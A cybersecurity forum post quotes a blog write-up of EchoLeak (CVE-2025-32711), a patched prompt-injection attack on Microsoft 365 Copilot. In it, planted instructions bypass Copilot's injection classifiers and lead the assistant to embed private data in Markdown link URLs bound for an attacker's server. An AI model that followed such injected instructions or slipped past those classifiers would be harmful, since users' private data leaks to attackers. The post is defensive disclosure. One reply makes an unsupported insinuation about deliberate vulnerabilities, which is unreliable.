this post was submitted on 12 Jun 2025
3 points (100.0% liked)

Cybersecurity

12 readers
6 users here now

An umbrella community for all things cybersecurity / infosec. News, research, questions, are all welcome!

Rules

Community Rules

founded 2 years ago
MODERATORS
[email protected]
[email protected]
3
"Aim Labs reported CVE-2025-32711 against Microsoft 365 Copilot back in January, and the fix is now rolled out. (tldr.nettime.org)
submitted 1 week ago by [email protected] to c/[email protected]
1 comments fedilink hide all child comments
 

"Aim Labs reported CVE-2025-32711 against Microsoft 365 Copilot back in January, and the fix is now rolled out.

This is an extended variant of the prompt injection exfiltration attacks we've seen in a dozen different products already: an attacker gets malicious instructions into an LLM system which cause it to access private data and then embed that in the URL of a Markdown link, hence stealing that data (to the attacker's own logging server) when that link is clicked.

The lethal trifecta strikes again! Any time a system combines access to private data with exposure to malicious tokens and an exfiltration vector you're going to see the same exact security issue.

In this case the first step is an "XPIA Bypass" - XPIA is the acronym Microsoft use for prompt injection (cross/indirect prompt injection attack). Copilot apparently has classifiers for these, but unsurprisingly these can easily be defeated:"

https://simonwillison.net/2025/Jun/11/echoleak/

#AI #GenerativeAI #CyberSecurity #EchoLeak #Microsoft #Microsof365Copilot #ZeroClickVulnerability #LLMs #PromptInjection #Markdown

top 1 comments
sorted by: hot top controversial new old
[–] [email protected] 1 points 1 week ago

@[email protected] remember the WeDAV related vuln yesterday?
WeDAV was developed by a Raytheon in the 90s.
These do not always happen by accident.
The targeting is better than the wild days of Adobe fake intallers.
You figure itn out. It will take further research.